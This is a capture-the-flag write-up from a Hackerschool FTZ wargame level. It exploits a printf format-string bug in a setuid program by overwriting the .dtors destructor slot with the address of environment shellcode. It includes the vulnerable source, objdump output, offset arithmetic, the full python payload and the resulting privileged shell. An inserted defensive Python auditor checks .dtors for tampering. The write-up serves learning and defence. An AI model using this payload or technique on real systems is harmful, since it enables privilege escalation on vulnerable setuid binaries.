http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2581
level20 / Modifying the .dtors (destructor) section to run shellcode.
[level20@ftz in]$ cat ~/hint
#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
setreuid(3101,3101);
fgets(bleh,79,stdin);
printf(bleh);
}
[level20@ftz in]$ ./egg 512 300
Using address: 0xbffff95c
// Functions with the constructor attribute run before main(),
// and functions with the destructor attribute run after main() returns.
// These attributes can be defined by the programmer,
// but even when none are defined, the sections still exist.
[level20@ftz in]$ objdump -h ~/attackme
/home/level20/attackme: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
.
.
14 .eh_frame 00000004 080484b4 080484b4 000004b4 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
15 .data 0000000c 080494b8 080494b8 000004b8 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dynamic 000000c8 080494c4 080494c4 000004c4 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .ctors 00000008 0804958c 0804958c 0000058c 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dtors 00000008 08049594 08049594 00000594 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .jcr 00000004 0804959c 0804959c 0000059c 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got 00000020 080495a0 080495a0 000005a0 2**2
CONTENTS, ALLOC, LOAD, DATA
[level20@ftz in]$ objdump -s -j .dtors ~/attackme
/home/level20/attackme: file format elf32-i386
Contents of section .dtors:
8049594 ffffffff 00000000 ........
/// Both .ctors and .dtors have the layout shown below.
/// 0xffffffff <function address> <another function address> ... 0x00000000
///
/// In the output above, the .dtors section of ~/attackme exists,
/// but since the function address is 00000000, no destructor appears to be defined.
/// If exactly this 00000000 slot is overwritten with the address where the shellcode sits, the attack should succeed.
/// 0x08049594 = ffffffff
/// 0x08049598 = 00000000 <-- this is the slot.
/// Attack preparation
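As an added example (not part of the original post), a small Python audit that parses an `objdump -s -j .dtors` dump into 32-bit words and checks the layout described above: the 0xffffffff sentinel, the 0x00000000 terminator, and that every entry between them points into the program's own code. The second sample dump is constructed to show what the section would look like once the slot at 0x08049598 has been overwritten with a stack address; the `.text` range is an assumption, not a value from the page.

```python
import re

# Constructed sample input: the .dtors dump shown in the writeup, and the same
# section as it would appear after the slot at 0x08049598 has been overwritten
# with the stack address 0xbffff95c (objdump prints bytes in memory order, so a
# little-endian word 0xbffff95c shows up as "5cf9ffbf").
CLEAN_DUMP = """Contents of section .dtors:
 8049594 ffffffff 00000000 ........
"""
TAMPERED_DUMP = """Contents of section .dtors:
 8049594 ffffffff 5cf9ffbf ........
"""

# Assumed range of the program's own code: the writeup's `objdump -h` places
# .eh_frame at 0x080484b4, so .text ends below that; the start is assumed.
TEXT_RANGE = (0x08048000, 0x080484B4)

WORD_RE = re.compile(r"^\s*([0-9a-f]+)((?:\s[0-9a-f]{8})+)")


def parse_section_dump(dump):
    """Turn `objdump -s` output into a list of (address, 32-bit value) pairs."""
    words = []
    for line in dump.splitlines():
        m = WORD_RE.match(line)
        if not m:
            continue  # header line such as "Contents of section .dtors:"
        base = int(m.group(1), 16)
        for i, hexword in enumerate(m.group(2).split()):
            value = int.from_bytes(bytes.fromhex(hexword), "little")
            words.append((base + 4 * i, value))
    return words


def audit_dtors(dump, text_range=TEXT_RANGE):
    """Check the .ctors/.dtors layout: 0xffffffff sentinel, function pointers
    into .text, 0x00000000 terminator. Returns a list of findings (empty = ok)."""
    words = parse_section_dump(dump)
    findings = []
    if not words or words[0][1] != 0xFFFFFFFF:
        findings.append("missing 0xffffffff sentinel at start of section")
    if words and words[-1][1] != 0:
        findings.append("missing 0x00000000 terminator; last word is %#x" % words[-1][1])
    lo, hi = text_range
    for addr, value in words[1:]:
        if value == 0:
            break  # terminator reached; no more entries
        if not lo <= value < hi:
            findings.append("entry at %#x points outside .text: %#x" % (addr, value))
    return findings
```

Run against a binary or core dump of interest, a non-empty result from `audit_dtors` is the forensic signal that a destructor slot was redirected away from the program's code; RELRO prevents this by making .dtors read-only before main() runs.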
[level20@ftz in]$ ~/attackme
AAAABBBB %x %x %x %x %x
AAAABBBB 4f 40157460 4009d500 41414141 42424242
/// From the output above, a format string attack using the $ flag can be carried out.
/// The first function address slot of .dtors, at 0x08049598, will be overwritten with the address where the shellcode starts.
Shellcode location given by Eggshell : Using address: 0xbffff95c
0xf95c = 63836
63836 - 8 bytes = 63828
0x1bfff = 114687
114687 - 63836 = 50851
"\x98\x95\x04\x08"+"\x9a\x95\x04\x08" -- 8 bytes
"%63828x%4$n%50851x%5$n"
[level20@ftz in]$ (python -c 'print "\x98\x95\x04\x08"+"\x9a\x95\x04\x08"+"%63828x%4$n%50851x%5$n"';cat) | ~/attackme
..............(output omitted)............................
40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass
TERM environment variable not set.
clear Password is "************************".
---------------------------------------------------------------------------------------------
References--
How to make shellcode in linux for beginners ( http://hdp.null2root.org/system/willy_sc.txt )
Understanding the Format String Bug (http://badnom.com/211)
Format String attack using the $ flag (http://x82.inetcop.org/h0me/papers/$-flag-formatstring.txt)
randomkid's post on the Hackerschool Q&A board (http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=2578)
Overwriting the .dtors section to change program execution (http://www.hackerschool.org/HS_Boards/data/Lib_system/dtor_fs.txt)
Hit : 3405 Date : 2007/11/23 04:03